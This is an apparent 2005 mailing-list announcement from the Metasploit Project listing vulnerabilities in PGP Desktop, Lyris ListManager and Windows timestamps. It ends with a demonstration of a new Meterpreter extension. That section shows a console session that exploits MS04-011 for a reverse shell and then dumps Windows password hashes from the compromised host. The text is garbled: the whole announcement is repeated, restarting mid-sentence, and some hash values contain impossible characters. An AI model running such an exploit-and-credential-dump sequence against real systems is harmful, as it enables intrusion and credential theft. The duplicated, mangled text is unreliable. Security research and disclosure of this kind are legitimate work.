H D Moore
09/12/05, 23:30
The Metasploit Project has released three new vulnerability sets and a
password dumping extension to the Meterpreter payload. Enjoy!
-HD
[ PGP Desktop Wipe Free Space Flaw ]
PGP Desktop includes a Wipe Free Space utility that claims to eliminate
data in all the free space on your hard drive including the the little
areas after the end of existing files which may still have old data left
behind. In short, the utility claims to wipe file slack space, the unused
space in a disk cluster. The software does not work as advertised. It
does not clean slack space.
- http://metasploit.com/research/vulns/pgp_slackspace/
[ Lyris ListManager Multiple Flaws ]
The Lyris ListManager software is vulnerable to numerous SQL injection,
source code dislosure, and authentication bypass flaws. The ListManager
software runs on Linux, Solaris, and Windows and can be configured to use
one of the following database backends: PostgreSQL, Oracle, and
MSSQL/MSDE. These flaws can be used to gain complete access to the
ListManager data and often the host server itself.
- http://metasploit.com/research/vulns/lyris_listmanager/
[ Windows File Time Stamp Display Flaw ]
Windows file time stamps can be set to extremely low values via the
NtSetInformationFile() system call. The Windows API does not properly
translate the low 64-bit time values stored on disk into human readable
format, and displays no information instead. Although this is not a
security vulnerability in itself, it adversely affects third-party
applications that rely upon the Windows API to perform the translation.
- http://metasploit.com/research/vulns/windows_timestamp/
[ Sam Juicer ]
A new extension has been added to the Meterpreter uber-payload in the
Metasploit Framework. This extension allows you to dump the local Windows
password hashes from a Meterpreter shell. The password dump is
accomplished without writing any files to disk, as opposed to any version
of pwdump available today. The Sam Juicer extension can be obtained via
'msfupdate' or by downloading the latest snapshot of v2.5 of the
Metasploit Framework. After successfully exploiting a system with one of
the 'meterpreter' payloads, run the following commands to load the
extension and dump the password hashes:
msf lsass_ms04_011(win32_reverse_meterpreter) > exploit
Starting Reverse Handler.
Windows 2000 target
Sending request...
Got connection from 192.168.0.100:4321 <-> 192.168.0.252:1124
Sending Stage (2834 bytes)
Sleeping before sending dll.
Uploading dll to memory (69643), Please wait...
Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter>
<< load the Sam extension with the 'use' command >>
meterpreter> use -m Sam
loadlib: Loading library from 'ext551353.dll' on the remote machine.
loadlib: success.
<< use the gethashes command to dump the local password hashes >>
meterpreter> gethashes
Administrator:500:ec6r3a5c0k6mce249053939542f2c6c4 :cp6wan5tahdibs94e89e2ffb49f307fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::
[ snip ]
password dumping extension to the Meterpreter payload. Enjoy!
-HD
[ PGP Desktop Wipe Free Space Flaw ]
PGP Desktop includes a Wipe Free Space utility that claims to eliminate
data in all the free space on your hard drive including the the little
areas after the end of existing files which may still have old data left
behind. In short, the utility claims to wipe file slack space, the unused
space in a disk cluster. The software does not work as advertised. It
does not clean slack space.
- http://metasploit.com/research/vulns/pgp_slackspace/
[ Lyris ListManager Multiple Flaws ]
The Lyris ListManager software is vulnerable to numerous SQL injection,
source code dislosure, and authentication bypass flaws. The ListManager
software runs on Linux, Solaris, and Windows and can be configured to use
one of the following database backends: PostgreSQL, Oracle, and
MSSQL/MSDE. These flaws can be used to gain complete access to the
ListManager data and often the host server itself.
- http://metasploit.com/research/vulns/lyris_listmanager/
[ Windows File Time Stamp Display Flaw ]
Windows file time stamps can be set to extremely low values via the
NtSetInformationFile() system call. The Windows API does not properly
translate the low 64-bit time values stored on disk into human readable
format, and displays no information instead. Although this is not a
security vulnerability in itself, it adversely affects third-party
applications that rely upon the Windows API to perform the translation.
- http://metasploit.com/research/vulns/windows_timestamp/
[ Sam Juicer ]
A new extension has been added to the Meterpreter uber-payload in the
Metasploit Framework. This extension allows you to dump the local Windows
password hashes from a Meterpreter shell. The password dump is
accomplished without writing any files to disk, as opposed to any version
of pwdump available today. The Sam Juicer extension can be obtained via
'msfupdate' or by downloading the latest snapshot of v2.5 of the
Metasploit Framework. After successfully exploiting a system with one of
the 'meterpreter' payloads, run the following commands to load the
extension and dump the password hashes:
msf lsass_ms04_011(win32_reverse_meterpreter) > exploit
Starting Reverse Handler.
Windows 2000 target
Sending request...
Got connection from 192.168.0.100:4321 <-> 192.168.0.252:1124
Sending Stage (2834 bytes)
Sleeping before sending dll.
Uploading dll to memory (69643), Please wait...
Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter>
<< load the Sam extension with the 'use' command >>
meterpreter> use -m Sam
loadlib: Loading library from 'ext551353.dll' on the remote machine.
loadlib: success.
<< use the gethashes command to dump the local password hashes >>
meterpreter> gethashes
Administrator:500:ec6r3a5c0k6mce249053939542f2c6c4 :cp6wan5tahdibs94e89e2ffb49f307fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::
[ snip ]